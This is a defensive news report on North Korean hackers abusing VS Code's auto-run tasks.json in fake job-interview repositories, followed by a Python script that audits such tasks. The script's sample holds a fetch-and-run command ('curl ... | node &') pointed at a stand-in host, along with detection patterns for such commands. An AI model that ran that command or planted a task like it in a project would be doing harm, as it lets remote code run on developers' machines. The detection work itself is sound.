North Korean state-sponsored hackers, attributed to the Lazarus Group, have been observed abusing a legitimate feature of Microsoft Visual Studio Code (VS Code) in their ongoing "Contagious Interview" campaign. This sophisticated operation targets software developers by masquerading as potential employers to distribute malware.
Malicious Use of Visual Studio Code
In this campaign, attackers create deceptive Git repositories on platforms like GitHub or GitLab, presenting them as legitimate projects. During the interview process, they convince victims to clone and open these repositories using VS Code. Once the repository is opened, VS Code prompts the user to trust the repository author. If the user complies, VS Code automatically processes a `tasks.json` configuration file, executing embedded malicious commands. (itsecuritynews.info)
Malware Deployment and Data Exfiltration
On macOS systems, these commands initiate a background shell that retrieves a JavaScript payload from remote servers, such as Vercel. The payload establishes a persistent loop, harvesting system information—including hostname, MAC addresses, and operating system details—and communicates with a remote command-and-control (C2) server. This backdoor periodically sends system data and receives further malicious instructions. (itsecuritynews.info)
Recommendations for Developers
Security experts advise developers to exercise caution when interacting with third-party repositories, especially those from untrusted sources. Before marking a repository as trusted in VS Code, it is crucial to review its contents thoroughly. Additionally, keeping endpoint threat-prevention controls enabled can help mitigate such attacks. (itsecuritynews.info)
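One way to perform that review before trusting a cloned repository is to inspect its VS Code task definitions for tasks that run automatically on folder open, the mechanism described above. The audit script below is an added example written for this page, not code from the article or from Jamf Threat Labs; the indicator patterns and the sample `tasks.json` it checks are constructed assumptions.

```python
import json
import re
# A task with runOptions.runOn == "folderOpen" starts as soon as a trusted workspace opens.
AUTO_RUN = "folderOpen"

# Heuristic indicators for an auto-run task (assumed for this example, not a vendor list).
SUSPICIOUS = [
    re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|zsh|node)\b", re.I),  # fetch-and-execute
    re.compile(r"\bbase64\b.*(-d|--decode)\b", re.I),                 # decode embedded payload
    re.compile(r"&\s*$"),                                             # detached background job
]
def strip_jsonc(text: str) -> str:
    """tasks.json allows // comments; drop them without touching '//' inside strings (URLs)."""
    out, i, in_str = [], 0, False
    while i < len(text):
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < len(text):
                out.append(text[i + 1]); i += 1          # keep the escaped char, e.g. \"
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True; out.append(c)
        elif text.startswith("//", i):
            nl = text.find("\n", i); i = (len(text) if nl == -1 else nl) - 1
        else:
            out.append(c)
        i += 1
    return "".join(out)

def audit_tasks(text: str) -> list[dict]:
    """One finding per auto-run task in a tasks.json body, with the indicators it matched."""
    findings = []
    for task in json.loads(strip_jsonc(text)).get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != AUTO_RUN:
            continue
        cmd = " ".join(str(x) for x in [task.get("command", ""), *task.get("args", [])])
        findings.append({"label": task.get("label", "<unnamed>"), "command": cmd,
                         "indicators": [p.pattern for p in SUSPICIOUS if p.search(cmd)]})
    return findings

# Constructed sample .vscode/tasks.json: a normal build task beside one that fires on open.
SAMPLE = r'''{ // constructed sample, not taken from any real repository
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "setup", "type": "shell", "runOptions": {"runOn": "folderOpen"},
     "command": "curl -fsSL https://example.invalid/loader.js | node &"}]}'''
```

Any auto-run task is worth a manual look even when no indicator matches; the pattern list only prioritises findings.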
Background on the Contagious Interview Campaign
The "Contagious Interview" campaign has been active since at least November 2023, with North Korean threat actors posing as recruiters to lure software developers into downloading and executing malicious code. This campaign has led to significant cryptocurrency thefts and underscores the evolving tactics of state-sponsored cyber actors. (mofa.go.jp)
For more detailed information on this campaign and protective measures, refer to the official report by Jamf Threat Labs. (itsecuritynews.info)
